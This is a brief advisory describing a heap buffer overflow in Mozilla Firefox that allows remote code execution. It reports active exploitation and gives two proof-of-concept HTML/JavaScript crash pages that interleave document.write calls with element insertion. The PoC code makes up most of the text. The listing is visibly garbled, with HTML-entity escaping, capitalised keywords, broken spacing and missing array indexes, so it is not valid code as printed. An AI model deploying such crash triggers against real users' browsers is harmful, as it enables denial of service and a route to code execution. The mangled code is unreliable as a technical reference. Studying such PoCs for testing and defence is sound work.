Mozilla Firefox is prone to a remote heap buffer overflow vulnerability.
Successful attacks allow attackers to run arbitrary code in the context of the user running the application.
A failed attack may cause a denial-of-service condition.
Test method:
This problem is currently being exploited in the wild.
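The following proof-of-concept code is available (from the Mozilla test cases). Both test cases interleave document.write calls with inserting newly created elements into the document body. The listing below was HTML-entity-escaped and altered during extraction (for example, "& lt;" in place of "<", and capitalised keywords), so it is not valid markup as shown: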
& Lt; html & gt; & lt; body & gt;
& Lt; script & gt;
Function G (str ){
Var cobj = document. createElement (str );
Document. body. appendChild (cobj );
Cobj. scrollWidth;
}
Function crashme (){
Document. write (& quot; fooFOO & quot ;);
G (& quot; a & quot ;);
Document. write (& quot; & lt; a lang & gt; & lt;/a & gt; a & quot ;);
G (& quot; base & quot ;);
Document. write (& quot; barBAR & quot ;);
G (& quot; audio & quot ;);
}
& Lt;/script & gt;
& Lt; script & gt; crashme (); & lt;/script & gt;
& Lt;/body & gt;
& Lt;/html & gt;
& Lt; html & gt; & lt; body & gt;
& Lt; script & gt;
Function getatts (str ){
Var cobj = document. createElement (str );
Cobj. id = & quot; testcase & quot ;;
Document. body. appendChild (cobj );
Var obj = document. getElementById (& quot; testcase & quot ;);
Var atts = new Array ();
For (p in obj ){
If (typeof (obj [p]) ==& quot; string & quot ;){
Atts. push (p );
}
}
Document. body. removeChild (cobj );
Return atts;
}
Function crashme (){
Var tags = new Array (& quot; audio & quot;, & quot; a & quot;, & quot; base & quot ;);
For (rows = 0; rows & lt; 0x8964; rows ++ ){
For (I = 0; I & lt; tags. length; I ++ ){
Var atts = getatts (tags );
For (j = 0; j & lt; atts. length; j ++ ){
Var html = & quot; & lt; & quot; + tags + & quot; + atts [j] + & quot; = a & gt; & lt; /& quot; + tags +
& Quot; & gt; & quot; + tags;
Document. write (html );
}
}
}
}
& Lt;/script & gt;
& Lt; button onclick = & quot; crashme (); & quot; & gt; Crash Me! & Lt;/button & gt;
& Lt;/body & gt; & lt;/html & gt;